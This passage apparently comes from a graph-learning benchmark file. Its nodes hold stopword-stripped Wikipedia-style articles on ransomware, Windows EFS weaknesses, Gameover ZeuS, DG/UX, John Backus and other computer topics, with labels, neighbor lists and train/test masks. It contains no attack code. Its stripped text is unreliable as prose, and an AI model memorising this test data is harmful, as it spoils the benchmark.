accusatory authority demanding victim pay fine 100 200 usd otherwise face fictitious charge rather surprisingly fusob suggests using itunes gift cards payment also timer clicking screen adds users ’ anxiety well order infect devices fusob masquerades pornographic video player thus victims thinking harmless unwittingly download fusob fusob installed first checks language used device uses russian certain eastern european languages fusob nothing otherwise proceeds lock device demand ransom among victims 40 germany united kingdom united states following 14.5 11.4 respectively fusob lots common small another major family mobile ransomware represented 93 mobile ransomware 2015 2016 may 2017 wannacry ransomware attack spread internet using exploit vector named eternalblue leaked u.s. national security agency ransomware attack unprecedented scale infected 230,000 computers 150 countries using 20 different languages demand money users using bitcoin cryptocurrency wannacry demanded us 300 per computer attack affected telefónica several large companies spain well parts british national health service nhs least 16 hospitals turn away patients cancel scheduled operations fedex deutsche bahn honda renault well russian interior ministry russian telecom megafon attackers gave victims 7-day deadline day computers got infected encrypted files would deleted petya first discovered march 2016 unlike forms encrypting ransomware malware aimed infect master boot record installing payload encrypts file tables ntfs file system next time infected system boots blocking system booting windows ransom paid check point reported despite believed innovative evolution ransomware design resulted relatively-fewer infections ransomware active around time frame 27 june 2017 heavily modified version petya used global cyberattack primarily targeting ukraine affecting many countries version modified propagate using eternalblue exploit used wannacry due another design change also unable actually unlock system ransom paid led security analysts speculating attack meant generate illicit profit simply cause disruption 24 october 2017 users russia ukraine reported new ransomware attack named bad rabbit follows similar pattern wannacry petya encrypting user file tables demands bitcoin payment decrypt eset believed ransomware distributed bogus update adobe flash software among agencies affected ransomware interfax odessa international airport kiev metro ministry infrastructure ukraine used corporate network structures spread ransomware also discovered countries including turkey germany poland japan south korea united states experts believed ransomware attack tied petya attack ukraine especially bad rabbit code many overlapping analogical elements code petya/notpetya appending crowdstrike bad rabbit notpetya dll dynamic link library share 67 percent code though identity culprits names characters game thrones series embedded within code security experts found ransomware use eternalblue exploit spread simple method vaccinate unaffected machine running older windows versions found 24 october 2017 sites used spread bogus flash updating gone offline removed problematic files within days discovery effectively killing spread bad rabbit 2016 new strain ransomware emerged targeting jboss servers strain named samsam found bypass process phishing illicit downloads favor exploiting vulnerabilities weak servers malware uses remote desktop protocol brute-force attack guess weak passwords one broken virus behind attacks government healthcare targets notable hacks occurring town farmington new mexico colorado department transportation davidson county north carolina recently major breach security infrastructure atlanta mohammad mehdi shah mansouri born qom iran 1991 faramarz shahi savandi born shiraz iran 1984 wanted fbi allegedly launching samsam ransomware two allegedly made 6 million extortion caused 30 million damages using malware forms malware security software antivirus software might detect ransomware payload especially case encrypting payloads encryption way complete particularly new version unknown protective software distributed attack suspected detected early stages takes time encryption take place immediate removal malware relatively simple process completed would stop damage data without salvaging already lost security experts suggested precautionary measures dealing ransomware using software security policies block known payloads launching help prevent infection protect attacks keeping offline backups data stored locations inaccessible potentially infected computer external storage drives devices access network including internet prevents accessed ransomware installing security updates issued software vendors mitigate vulnerabilities leveraged certain strains propagate measures include cyber hygiene − exercising caution opening e-mail attachments links network segmentation keeping critical computers isolated networks furthermore mitigate spread ransomware measures infection control applied may include disconnecting infected machines networks educational programs effective communication channels malware surveillance ways collective participation number file systems keep snapshots data hold used recover contents files time prior ransomware attack event ransomware n't disable number tools intended specifically decrypt files locked ransomware although successful recovery may possible encryption key used files decryption tools use files uncorrupted backups encrypted copies known-plaintext attack jargon cryptanalysis works cipher attacker used weak begin vulnerable known-plaintext attack recovery key possible may take several days free ransomware decryption tools help decrypt files encrypted following forms ransomware aes_ni alcatraz locker apocalypse badblock bart btcware crypt888 cryptomix crysis encryptile findzip globe hidden tear jigsaw lambdalocker legion noobcrypt stampado szflocker teslacrypt xdata addition old copies files may exist disk previously deleted cases deleted versions may still recoverable using software designed purpose ransomware malicious software evolved since beginnings confined one two countries eastern europe spread across atlantic united states canada first versions type malware used various techniques disable computers locking victims system machine locker ransomware 133 examples ransomware works include locking screen displaying message branch local law enforcement indicating user ’ lines like “ browsed illicit materials must pay fine ” first seen russia year 2009 claiming message microsoft also used request payment sending sms message premium rate number next variant displayed pornographic image content demanded payment removal 2011 tactics changed attackers started use electronic payment methods added languages messages also changed based user ’ location obtained geo-locating user ’ ip addresses end users affected attacks corporations private entities government even hospitals also affected example healthcare although 2015 year largest ephi data breaches occurred according onc 2016 year ransomware started increase exponentially market according 2017 internet security threat report symantec corp ransomware affects systems also patient care clinical operations billing online criminals found “ easy money made healthcare ” according symantec report developed data insurance claims u.s. department health human services hhs ransomware growing rapidly across internet users also iot environment creates challenging problem infosec increasing attack surface area evolving sophisticated attacks becoming resistant time also accessible ever today cheap price attackers access ransomware service big problem millions dollars lost organizations industries decided pay hollywood presbyterian medical center medstar health end pressure offer services patients keep lives critical forced pay attacker knows problem paying ransom funding cybercrime according symantec 2019 istr report first time since 2013 2018 observed decrease ransomware activity drop 20 percent 2017 consumers preferred victims 2017 changed dramatically moved enterprises 2018 path accelerated 81 percent infections represented 12 percent increase common distribution method today based email campaigns cyber awareness training crucial detecting attacks whereas technology protect careless foolish behavior important organizations help users recognize malicious contact whereas ransomware typically introduced email social engineering techniques either download file provide key sensitive information take action bring harm organization according knowbe4 osterman report number approaches security awareness training practiced organizations managed security teams break room approach special meetings periodically held talk security monthly security videos short snippets security information simulated phishing tests target users internal phishing messages human firewall approach everyone subject simulated phishing employees prone attack identified do-nothing approach cyber awareness training exist organization effective successful cyber awareness training program must sponsored top organization supporting policies procedures effectively outline ramifications non-compliance frequency training process acknowledgement training without sponsorship “ c-level ” executives training ignored factors key successful cyber awareness training program establish baseline identifying level knowledge organization establish users knowledge prior training whichever approach organization decides implement important organization policies procedures place provide training date performed frequently backing entire organization top investment technology detect stop threats must maintained along need remember focus weakest link user publication proof-of-concept attack code common among academic researchers vulnerability researchers teaches nature threat conveys gravity issues enables countermeasures devised put place however lawmakers support law-enforcement bodies contemplating making creation ransomware illegal state maryland original draft hb 340 made felony create ransomware punishable 10 years prison however provision removed final version bill minor japan arrested creating distributing ransomware code young yung ansi c source code ransomware cryptotrojan on-line cryptovirology.com since 2005 part cryptovirology book written source code cryptotrojan still live internet associated draft chapter 2",
    "neighbors": [
      1024,
      3072,
      5636,
      10245,
      10756,
      519,
      5131,
      9227,
      9233,
      2580,
      4117,
      8726,
      535,
      9242,
      2075,
      9761,
      2084,
      4133,
      4644,
      10278,
      9256,
      9771,
      3629,
      2611,
      10297,
      3643,
      7739,
      1087,
      1088,
      9791,
      4165,
      1608,
      3657,
      8779,
      4689,
      10836,
      1623,
      9819,
      1629,
      4703,
      8288,
      8292,
      107,
      8299,
      4725,
      10875,
      5245,
      5246,
      3711,
      127,
      7809,
      6786,
      131,
      5764,
      8320,
      9343,
      9351,
      7304,
      2187,
      8331,
      9356,
      4240,
      2193,
      4245,
      1688,
      665,
      1690,
      3225,
      3739,
      2717,
      9885,
      9375,
      10392,
      2721,
      5281,
      2213,
      11429,
      3757,
      7855,
      8368,
      9904,
      9395,
      8886,
      2744,
      3262,
      3774,
      704,
      8387,
      708,
      4807,
      7368,
      3789,
      5325,
      7887,
      4304,
      2259,
      2262,
      6360,
      3290,
      4314,
      9435,
      4830,
      3807,
      225,
      2275,
      5349,
      1254,
      6373,
      8940,
      10477,
      9460,
      3320,
      4344,
      7418,
      5371,
      10492,
      5373,
      1279,
      2815,
      4863,
      3843,
      6917,
      10502,
      9488,
      7441,
      8978,
      4883,
      2324,
      10003,
      278,
      4374,
      3867,
      4892,
      5404,
      3366,
      8998,
      297,
      2857,
      8489,
      300,
      11052,
      9518,
      3887,
      2864,
      818,
      6454,
      823,
      10550,
      1337,
      10747,
      11577,
      3395,
      9550,
      10574,
      4945,
      6484,
      857,
      1882,
      7515,
      4956,
      9569,
      3941,
      11621,
      877,
      5491,
      3956,
      4471,
      9591,
      1914,
      9082,
      8574,
      10110,
      3969,
      899,
      7044,
      1925,
      3462,
      7556,
      9607,
      5003,
      9102,
      11152,
      10132,
      1941,
      3996,
      10141,
      2975,
      1440,
      5024,
      931,
      5028,
      11175,
      939,
      5547,
      9646,
      4016,
      7601,
      1970,
      4023,
      441,
      7098,
      1979,
      4027,
      6588,
      9664,
      9156,
      3525,
      8133,
      9160,
      2508,
      11213,
      7633,
      467,
      11221,
      4054,
      7639,
      3032,
      8664,
      9688,
      10710,
      8668,
      1504,
      9186,
      9187,
      11244,
      2542,
      6646,
      2041,
      507,
      2558
    ],
    "mask": "Test"
  },
  {
    "node_id": 1971,
    "label": 2,
    "text": "DG/UX:dg/ux dg/ux discontinued unix operating system developed data general eclipse mv minicomputer line later aviion workstation server line motorola 88000 intel ia-32-based variants dg/ux 1.00 released march 1985 based unix system v release 2 additions 4.1bsd 1987 dg/ux 3.10 released 4.2bsd tcp/ip networking nfs x window system included dg/ux 4.00 1988 comprehensive re-design system based system v release 3 supporting symmetric multiprocessing eclipse mv 4.00 filesystem based aos/vs ii filesystem using logical disk facility could span multiple disks dg/ux 5.4 released around 1991 replaced legacy unix file buffer cache unified demand paged virtual memory management later versions based system v release 4 aviion dg/ux supported multiprocessor machines time variants unix operating system also complete unix variants example operating system included full c compiler gcc also logical volume manager os small compact rich features simple easy install require vast resources memory processing power example six-way pentium pro-based aviion would support several hundred users using text terminals volume manager built os simple powerful disk administration could performed online without taking file system offline included extending relocating mirroring shrinking functions could performed swap area allowing in-place migrations disk storage without downtime dg/ux 5.4 supported filesystem shrinking split mirror online backup filesystems 2 tb filesystem journaling 1991 vendors offered similar features time later versions added support processor memory affinity support high-end multiprocessor numa aviion system",
    "neighbors": [
      2179,
      5380,
      6787,
      6412,
      6675,
      5397,
      1304,
      3487,
      3241,
      7983,
      3248,
      2995,
      9141,
      5046,
      823,
      9784,
      9151,
      10436,
      8262,
      4438,
      96,
      6369,
      8048,
      5492,
      2424,
      633,
      2045
    ],
    "mask": "None"
  },
  {
    "node_id": 1972,
    "label": 2,
    "text": "OFono:ofono ofono free software project mobile telephony gsm/umts applications built 3gpp standards uses high-level d-bus api use telephony applications ofono free software released terms gnu general public license v2 ofono jointly announced linux intel nokia nokia since shipped ofono meego-based n9 meego project ended intel collaborated samsung new linux-based project named tizen first release tizen contained another telephony stack 2012 announced replace ofono early 2013 canonical ltd announced ubuntu touch also uses ofono another successor project meego sailfish os also uses ofono telephony since version 1.4 released august 2016 networkmanager use ofono modem manager",
    "neighbors": [
      3082,
      4622,
      5139,
      10780,
      10785,
      6180,
      6694,
      9262,
      8242,
      9266,
      1085,
      6213,
      6730,
      7755,
      8268,
      8795,
      5222,
      10856,
      2684,
      4734,
      7812,
      4238,
      10382,
      2195,
      2711,
      9882,
      1694,
      2723,
      10933,
      5815,
      5822,
      704,
      1728,
      1736,
      2762,
      8909,
      8410,
      10971,
      3294,
      8928,
      737,
      1761,
      2278,
      9959,
      233,
      10482,
      2294,
      8439,
      2809,
      6911,
      4360,
      4365,
      792,
      10016,
      295,
      7983,
      823,
      6968,
      7992,
      6971,
      318,
      3911,
      6988,
      10063,
      5975,
      10091,
      7540,
      8573,
      1406,
      8066,
      900,
      5514,
      4493,
      9621,
      8602,
      11678,
      1444,
      1445,
      9637,
      935,
      4521,
      4011,
      457,
      2529,
      6625,
      8676,
      2021,
      1513,
      3055,
      5105,
      499,
      2036,
      8186,
      2044,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 1973,
    "label": 9,
    "text": "Instance_variable:instance variable object-oriented programming classes instance variable variable defined class i.e member variable instantiated object class separate copy instance instance variable similar class variable instance variable variable declared class outside constructor method/function instance variables created object instantiated accessible methods constructor block class access modifiers given instance variable instance variable class variable although similarities type class attribute class property field data member dichotomy instance class members applies methods member functions well class may instance methods class methods instance variable lives memory life object owned variables properties object knows instances object copies instance variables even value one object another one object instance change values instance variables without affecting instances instance variables used methods class unless method declared static c++ example instance variable codice_1 copy class variable codice_2 instance constructed assigned sequential value codice_3 incremented since codice_4 instance variable codice_5 object contains distinct value contrast one object codice_2 available instances value",
    "neighbors": [
      2048,
      11589,
      4486,
      2029,
      5945,
      10075,
      2556,
      9245,
      6335
    ],
    "mask": "Test"
  },
  {
    "node_id": 1974,
    "label": 3,
    "text": "Gran_Turismo_official_steering_wheel:gran turismo official steering wheel gran turismo official steering wheels gt force driving force see trademark symbols difference series steering wheels designed logitech a.k.a logicool japan collaboration polyphony digital racing games controllers designed used playstation 2 playstation 3 systems later models used pc well due usb connection gt force central part driving simulation cockpit installation official kits co-designed released japan logicool sparco distributed import tuner endless north america compatible kits designed released worldwide european manufacturers playseat® movetech features common models include features vary models original gt force first came japan south east asia 2001 later released north america europe brand soon evolved driving force logitech distributed territories code product lprc logicool playstation racing controller 2007 gt force line-up made three wheels entry-level gt force rx replacing discontinued driving force type 79.99 usd/eur medium-level gt force pro 129.98 usd/eur g25 racing wheel replaced first top level 299.99 usd/eur compatible playstation 2 playstation 3 windows pc systems supported gran turismo 5 prologue gt force lprc-10000 rebranded logitech wingman formula gp blue rather yellow rubber grip released april 28 2001 official wheel gt force gran turismo 2000 lprc-10001 scheduled 2001 however due game title change replaced gt force gran turismo 3 a-spec custom version released april 28 2001 june 26 2003 logicool released initial special stage custom version gt force lprc-10000 driving force first evolution gt force announced london games convention early september 2001 model discontinued since replaced driving force pro 2003 driving force pro also known gt force pro lprc-11000 gran turismo 4 prologue official wheel released december 2003 sega rally 2006 custom version named released january 12 2006 manufactured logitech playstation 2 primarily well compatible select pc games wheel featured force feedback 900 degree rotation wheel offers analogue accelerator brake pedals sequential gear shift side paddle shifters mounted back wheel addition standard playstation 2 buttons controller jointly designed logitech polyphony digital used gran turismo 4 however works games compatible 900 degree rotation switching 200 degree mode wheel received strong praise reviewers launch overall good experience paired gran turismo 4 logitech website lists playstation 3 system requirements indicating supported 900° support software dependent driving force ex also known gt force rx lprc-12000 driving force rx retail version playstation 3 official wheel released console launch date november 11 2006 features force feedback succeeded driving force gt wheel came bundled formula one championship edition driving force gt released december 13 2007 developed conjunction polyphony digital first introduced 2007 tokyo game show intended use gran turismo 5 prologue gran turismo 5 playstation 3 auto racing games driving force gt fifth entry company driving force series game controllers g25 racing wheel lprc-13000 unveiled october 25 2007 released december 13 2007 currently matching official racing cockpit available official gt steering wheel fully compatible updates officially supported gt5 gt6 g27 racing wheel based upon previous g25 new features like g25 g27 also official gt steering wheel fully compatible updates officially supported gt5 gt6 g29 driving force racing wheel based upon g27 driving force gt compatible playstation 3 playstation 4 pc released 2015 replace g27 like g27 also official gran turismo steering wheel however supported gran turismo latest installment gran turismo sport",
    "neighbors": [
      4675,
      8937,
      5291,
      10316,
      5746
    ],
    "mask": "Train"
  },
  {
    "node_id": 1975,
    "label": 4,
    "text": "National_White_Collar_Crime_Center:national white collar crime center national white collar crime center also known nw3c congressionally funded non-profit corporation trains state local law enforcement agencies combat emerging economic cyber crime problems nw3c provides general public information research preventing economic cyber crime national white collar crime center provides training investigative support research organizations involved preventing investigating prosecuting economic high tech crime",
    "neighbors": [
      4945,
      6475,
      4500,
      2558
    ],
    "mask": "Test"
  },
  {
    "node_id": 1976,
    "label": 9,
    "text": "John_Backus:john backus john warner backus december 3 1924 – march 17 2007 american computer scientist directed team invented implemented fortran first widely used high-level programming language inventor backus–naur form bnf widely used notation define formal language syntax later research function-level programming paradigm presenting findings influential 1977 turing award lecture programming liberated von neumann style ieee awarded backus w. w. mcdowell award 1967 development fortran received national medal science 1975 1977 acm turing award profound influential lasting contributions design practical high-level programming systems notably work fortran publication formal procedures specification programming languages retired 1991 died home ashland oregon march 17 2007 backus born philadelphia grew nearby wilmington delaware studied hill school pottstown pennsylvania apparently diligent student entering university virginia study chemistry quit conscripted u.s. army began medical training haverford college internship hospital diagnosed cranial bone tumor successfully removed plate installed head ended medical training nine months subsequent operation replace plate one design moving new york city trained initially radio technician became interested mathematics graduated columbia university bachelor degree 1949 master degree 1950 mathematics joined ibm 1950 first three years worked selective sequence electronic calculator ssec first major project write program calculate positions moon 1953 backus developed language speedcoding first high-level language created ibm computer aid software development ibm 701 computer programming difficult time 1954 backus assembled team define develop fortran ibm 704 computer fortran first high-level programming language put broad use backus served international committees developed algol 58 influential algol 60 quickly became de facto worldwide standard publishing algorithms backus developed backus–naur form bnf unesco report algol 58 formal notation able describe context-free programming language important development compilers deviations approach tried—notably lisp apl—but 1970s following development automated compiler generators yacc backus–naur context-free specifications computer languages become quite standard contribution helped backus win turing award 1977 backus later worked function-level programming language known fp described turing award lecture programming liberated von neumann style sometimes viewed backus apology creating fortran paper less garner interest fp language spark research functional programming general backus publicized function-level style programming message mostly misunderstood traditional functional programming style languages fp strongly inspired kenneth e. iverson apl even using non-standard character set fp interpreter distributed 4.2bsd unix operating system relatively implementations language used educational purposes backus spent latter part career developing fl function level successor fp fl internal ibm research project development language stopped project finished papers documenting remain source code compiler described made public fl odds functional programming languages developed 1980s based lambda calculus static typing systems instead apl concatenation primitive operations many language ideas implemented versions j programming language iverson successor apl",
    "neighbors": [
      512,
      4483,
      7048,
      11020,
      7055,
      1952,
      1826,
      6950,
      2216,
      10668,
      8879,
      5168,
      2482,
      1976,
      4799,
      4800,
      9151,
      4930,
      10049,
      10560,
      11075,
      70,
      8262,
      1864,
      3529,
      1610,
      9804,
      5585,
      2774,
      2519,
      5081,
      1883,
      7775,
      10720,
      9315,
      6502,
      11242,
      2283,
      8301,
      2670,
      2798,
      8175,
      8813,
      9330,
      9714,
      5492,
      3960,
      8057,
      3323,
      511
    ],
    "mask": "Test"
  },
  {
    "node_id": 1977,
    "label": 5,
    "text": "Inverse_multiplexer:inverse multiplexer inverse multiplexer often abbreviated inverse mux imux allows data stream broken multiple lower data rate communication links inverse multiplexer differs demultiplexer multiple output streams former stay inter-related whereas latter unrelated inverse multiplexer opposite multiplexer divides one high-speed link multiple low-speed links whereas multiplexer combines multiple low-speed links one high-speed link provides end end connection several times data rate available low rate data links note multiplexers links often used bi-directional pairs either end link inverse multiplexer combined reverse inverse demultiplexer still called inverse mux inverse multiplexers used example combine number isdn channels together one high rate circuit higher rate connection available single isdn connection needed typically useful areas higher rate circuits available alternative inverse multiplexer use three separate links load sharing data case ip network packets could sent round-robin mode separate link advantages using inverse multiplexing separate links include simple analogy transport help explain distinction multiplexing inverse multiplexing small cargoes pencils shipped overseas generally carried one time rather assembled small boxes grouped larger cartons go intermodal containers join multiple containers aboard container ship step analogous multiplexing process conversely large cargo example structure relocation may disassembled carriage multiple vehicles reassembled correct order destination analogous inverse multiplexing",
    "neighbors": [
      8160,
      7815,
      7049,
      2668,
      6318,
      1967,
      8432,
      2994,
      5304,
      4671
    ],
    "mask": "None"
  },
  {
    "node_id": 1978,
    "label": 6,
    "text": "Encrypting_File_System:encrypting file system encrypting file system efs microsoft windows feature introduced version 3.0 ntfs provides filesystem-level encryption technology enables files transparently encrypted protect confidential data attackers physical access computer efs available versions windows developed business environments see supported operating systems windows 2000 onwards default files encrypted encryption enabled users per-file per-directory per-drive basis efs settings also mandated via group policy windows domain environments cryptographic file system implementations operating systems available microsoft efs compatible see also list cryptographic file systems operating system running system without file encryption access files normally goes os-controlled user authentication access control lists however attacker gains physical access computer barrier easily circumvented one way example would remove disk put another computer os installed read filesystem another would simply reboot computer boot cd containing os suitable accessing local filesystem widely accepted solution store files encrypted physical media disks usb pen drives tapes cds microsoft windows family operating systems efs enables measure although ntfs drives using combination public key cryptography symmetric key cryptography make decrypting files extremely difficult without correct key however cryptography keys efs practice protected user account password therefore susceptible password attacks words encryption file strong password unlock decryption key efs works encrypting file bulk symmetric key also known file encryption key fek uses symmetric encryption algorithm takes less time encrypt decrypt large amounts data asymmetric key cipher used symmetric encryption algorithm used vary depending version configuration operating system see algorithms used windows version fek symmetric key used encrypt file encrypted public key associated user encrypted file encrypted fek stored efs alternative data stream encrypted file decrypt file efs component driver uses private key matches efs digital certificate used encrypt file decrypt symmetric key stored efs stream efs component driver uses symmetric key decrypt file encryption decryption operations performed layer ntfs transparent user applications folders whose contents encrypted file system marked encryption attribute efs component driver treats encryption attribute way analogous inheritance file permissions ntfs folder marked encryption default files subfolders created folder also encrypted encrypted files moved within ntfs volume files remain encrypted however number occasions file could decrypted without user explicitly asking windows files folders decrypted copied volume formatted another file system like fat32 finally encrypted files copied network using smb/cifs protocol files decrypted sent network significant way preventing decryption-on-copy using backup applications aware raw apis backup applications implemented raw apis simply copy encrypted file stream efs alternative data stream single file words files copied e.g backup file encrypted form decrypted backup starting windows vista user private key stored smart card data recovery agent dra keys also stored smart card two significant security vulnerabilities existed windows 2000 efs variously targeted since windows 2000 local administrator default data recovery agent capable decrypting files encrypted efs local user efs windows 2000 function without recovery agent always someone decrypt encrypted files users non-domain-joined windows 2000 computer susceptible unauthorized efs decryption anyone take local administrator account trivial given many tools available freely internet windows xp later default local data recovery agent requirement one setting syskey mode 2 3 syskey typed bootup stored floppy disk mitigate risk unauthorized decryption local administrator account local user password hashes stored sam file encrypted syskey syskey value available offline attacker possess syskey passphrase/floppy windows 2000 user rsa private key stored truly encrypted form also backup user rsa private key weakly protected attacker gains physical access windows 2000 computer resets local user account password attacker log user recovery agent gain access rsa private key decrypt files backup user rsa private key encrypted lsa secret accessible attacker elevate login localsystem trivial given numerous tools internet windows xp beyond user rsa private key backed using offline public key whose matching private key stored one two places password reset disk windows xp member domain active directory windows xp member domain means attacker authenticate windows xp localsystem still access decryption key stored pc hard drive windows 2000 xp later user rsa private key encrypted using hash user ntlm password hash plus user name – use salted hash makes extremely difficult reverse process recover private key without knowing user passphrase also setting syskey mode 2 3 syskey typed bootup stored floppy disk mitigate attack since local user password hash stored encrypted sam file user logged successfully access efs encrypted data requires additional authentication decryption happens transparently thus compromise user password automatically leads access data windows store versions user account passphrases reversible encryption though longer default behaviour also configured store default original version windows xp lower lan manager hashes local user account passphrases attacked broken easily also stores local user account passphrases ntlm hashes fairly easily attacked using rainbow tables passwords weak windows vista later versions n't allow weak passwords default mitigate threat trivial brute-force attacks local passphrases older versions windows need configured using security settings portion group policy never store lm hashes course enable autologon stores plaintext passphrases registry using local user account passphrases 14 characters long prevents windows storing lm hash sam – added benefit making brute-force attacks ntlm hash harder encrypting files efs – converting plaintext files encrypted files – plaintext files wiped simply deleted i.e data blocks flagged use filesystem means unless example happen stored ssd trim support easily recovered unless overwritten fully mitigate known non-challenging technical attacks efs configure encryption folder level temporary files like word document backups created directories also encrypted wish encrypt individual files copy encrypted folder encrypt file place securely wipe disk volume use windows cipher utility /w option wipe free space including still contains deleted plaintext files various third-party utilities may work well anyone gain administrators access overwrite override change data recovery agent configuration serious issue since attacker example hack administrator account using third-party tools set whatever dra certificate want data recovery agent wait sometimes referred two-stage attack significantly different scenario risk due lost stolen pc highlights risk due malicious insiders user encrypts files first stage attack feks automatically encrypted designated dra public key attacker needs access computer administrator gain full access subsequently efs-encrypted files even using syskey mode 2 3 protect attack attacker could back encrypted files offline restore elsewhere use dra private key decrypt files course malicious insider gain physical access computer might consider security features irrelevant could also install rootkits software even hardware keyloggers etc computer – potentially much interesting effective overwriting dra policy files encrypted efs decrypted using rsa private key matching previously used public key stored copy user private key ultimately protected user logon password accessing encrypted files outside windows operating systems linux example possible — least currently third party efs component driver using special tools reset user login password render impossible decrypt user private key thus useless gaining access user encrypted files significance occasionally lost users resulting data loss user forgets password fails back encryption key led coining term delayed recycle bin describe seeming inevitability data loss inexperienced user encrypts files efs configured use keys issued public key infrastructure pki configured enable key archival recovery encrypted files recovered recovering private key first operating systems file systems native support efs windows efs supports range symmetric encryption algorithms depending version windows use files encrypted",
    "neighbors": [
      5120,
      2050,
      2564,
      11270,
      2568,
      5643,
      6669,
      3598,
      4624,
      9745,
      6674,
      10257,
      9236,
      6677,
      5142,
      8214,
      537,
      8729,
      3611,
      540,
      3102,
      9249,
      9762,
      8227,
      8740,
      5158,
      1577,
      10281,
      3629,
      2101,
      7225,
      11323,
      10812,
      3648,
      9281,
      8772,
      10310,
      1098,
      7754,
      10828,
      4173,
      4174,
      9808,
      4178,
      1109,
      10839,
      603,
      8283,
      9819,
      1634,
      3170,
      4708,
      9319,
      5225,
      9836,
      7789,
      622,
      1647,
      9839,
      4210,
      7794,
      7796,
      5749,
      9333,
      6263,
      1656,
      6265,
      7290,
      4731,
      8315,
      4221,
      9335,
      9343,
      10879,
      6281,
      4746,
      651,
      7818,
      653,
      654,
      6797,
      8331,
      2193,
      2194,
      9874,
      10900,
      2197,
      2199,
      4248,
      11419,
      7838,
      9377,
      3235,
      4771,
      6309,
      1190,
      1703,
      5286,
      6820,
      7847,
      10405,
      2221,
      5293,
      7344,
      5300,
      2230,
      7351,
      5816,
      1212,
      2749,
      7356,
      8380,
      10428,
      3265,
      2244,
      8391,
      200,
      10951,
      9420,
      1741,
      8401,
      7378,
      3795,
      4819,
      8402,
      1750,
      8404,
      728,
      8410,
      9946,
      4316,
      6365,
      2782,
      9442,
      739,
      4836,
      7907,
      4326,
      2279,
      1770,
      8938,
      3308,
      1263,
      3312,
      10993,
      3826,
      2291,
      246,
      3834,
      6396,
      1791,
      3328,
      8959,
      11519,
      11012,
      2314,
      8461,
      3856,
      6416,
      1810,
      8978,
      3351,
      6935,
      8473,
      8985,
      11033,
      8988,
      11546,
      287,
      1825,
      6434,
      5413,
      808,
      3368,
      3881,
      4907,
      5928,
      9004,
      302,
      7983,
      10024,
      6961,
      10026,
      6963,
      1844,
      9525,
      10029,
      823,
      10033,
      5433,
      6970,
      10039,
      6972,
      5437,
      6462,
      11072,
      3394,
      3909,
      8517,
      2378,
      4431,
      5969,
      3922,
      4439,
      5465,
      346,
      2395,
      2397,
      2402,
      10596,
      2407,
      2919,
      10087,
      4458,
      6506,
      9066,
      11572,
      11638,
      6519,
      376,
      9593,
      890,
      11128,
      2943,
      3970,
      7554,
      3975,
      10631,
      1418,
      5003,
      5004,
      7565,
      8075,
      3984,
      6545,
      8080,
      5013,
      4505,
      11675,
      11676,
      11677,
      414,
      2974,
      7070,
      929,
      4001,
      11683,
      10151,
      4012,
      430,
      1454,
      6062,
      7088,
      8114,
      7603,
      10673,
      8631,
      1464,
      6584,
      1978,
      9655,
      960,
      8640,
      7106,
      8643,
      8132,
      8841,
      6088,
      969,
      3535,
      8659,
      9173,
      7126,
      1498,
      5594,
      478,
      2015,
      6114,
      6115,
      7139,
      1509,
      9189,
      10727,
      4074,
      2027,
      3053,
      6637,
      7663,
      9709,
      2545,
      6641,
      11249,
      3572,
      3573,
      8692,
      11256,
      2555,
      3582
    ],
    "mask": "Test"
  },
  {
    "node_id": 1979,
    "label": 7,
    "text": "Gameover_ZeuS:gameover zeus gameover zeus peer-to-peer botnet based components earlier zeus trojan malware created evgeniy mikhailovich bogachev russia believed spread use cutwail botnet unlike predecessor zeus trojan gameover zeus uses encrypted peer-to-peer communication system communicate nodes command control servers greatly reducing vulnerability law enforcement operations algorithm used appears modeled kademlia p2p protocol scammers control monitor gameover zeus via command control c c server virus establishes connection server soon malicious executable installs computer disables certain system processes download launch executables even delete essential system files easily bricking device according report symantec gameover zeus largely used banking fraud distribution cryptolocker ransomware early june 2014 u.s. department justice announced international inter-agency collaboration named operation tovar succeeded temporarily cutting communication gameover zeus command control servers effort shut evgeniy mikhailovich bogachev criminal infrastructure liberate computers infected gameover zeus indicted united states accused creating sprawling network virus-infected computers siphon hundreds millions dollars bank accounts around world targeting anyone enough money worth stealing widely circulated photo pictured holding domestic bengal cat bitdefender identified two gameover zeus variants wild one generates 1,000 domains per day generates 10,000 per day 24 february 2015 fbi announced reward 3 million exchange information regarding alleged russian cyber criminal evgeniy mikhailovich bogachev known online aliases « slavik » « lucky12345 » « pollingsoon » « monstr » « ioo » « nu11 » suspected association gameover zeus fbi reward 3 million highest ever cybercriminal",
    "neighbors": [
      1024,
      5636,
      5131,
      4117,
      8726,
      535,
      9761,
      4644,
      4133,
      4648,
      10297,
      2114,
      1608,
      3657,
      8779,
      4703,
      8288,
      8292,
      10875,
      3711,
      8320,
      2175,
      5764,
      2187,
      4240,
      1688,
      2717,
      9375,
      9904,
      9395,
      8886,
      10952,
      3789,
      4304,
      4314,
      9435,
      4830,
      3807,
      5349,
      1254,
      10477,
      9460,
      7418,
      2815,
      3843,
      10502,
      4883,
      10003,
      3867,
      297,
      2857,
      8489,
      11052,
      9518,
      1337,
      11583,
      6484,
      857,
      1882,
      7515,
      9569,
      4462,
      3956,
      9082,
      11152,
      10132,
      9630,
      1440,
      5024,
      5028,
      11175,
      5547,
      7601,
      1970,
      10166,
      441,
      4027,
      8640,
      9664,
      8133,
      2508,
      4054,
      7639,
      8664,
      988,
      1504,
      9186,
      2542,
      507,
      2558
    ],
    "mask": "Validation"
  },
  {
    "node_id": 1980,
    "label": 4,
    "text": "Co-managed_Security:co-managed security co-managed security service model entails security monitoring event correlation incident response system tuning compliance support across organization entire environment co-management allows organizations collaborate service providers blending security expertise provider contextual knowledge customer optimize security posture co-managed security services also allow organizations ’ critical data tools remotely managed team certified engineers security analysts 24/7/365 security operations center soc service approach allows customer data remain in-house siem platform either on-site cloud-hosted service provider staff works conjunction customer security teams outline rules engagement inside environment provide monitoring respond alerts real-time security operation center also provide “ care feeding ” development variety security solutions co-managed approach also allows organizations focus emerging internal projects critical areas according gartner use co-managed security information event management report “ co-managed siem services enable security risk management leaders maximize value siem enhance security monitoring capabilities retaining control flexibility. ” co-management rise expected grow five-fold 2020 siem ids/ips compliance automation network configuration management tools advanced threat intelligence network access control endpoint threat detection response application security file integrity monitoring forensic investigation vulnerability scanning assessment examples cyber security solutions co-managed service providers support",
    "neighbors": [
      11611,
      10196
    ],
    "mask": "Test"
  },
  {
    "node_id": 1981,
    "label": 3,
